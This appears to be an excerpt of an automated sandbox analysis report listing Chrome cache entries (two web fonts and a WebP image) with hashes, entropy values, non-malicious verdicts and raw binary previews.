                                                                                                                    Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.

                                                                                                                    Chrome Cache Entry: 97

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):43596
                                                                                                                    Entropy (8bit):7.9952701440723475
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-vf.woff2
                                                                                                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.

                                                                                                                    Chrome Cache Entry: 99

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):892
                                                                                                                    Entropy (8bit):5.863167355052868
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                    SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                    SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                    SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...

                                                                                                                    Static File Info

                                                                                                                    No static file info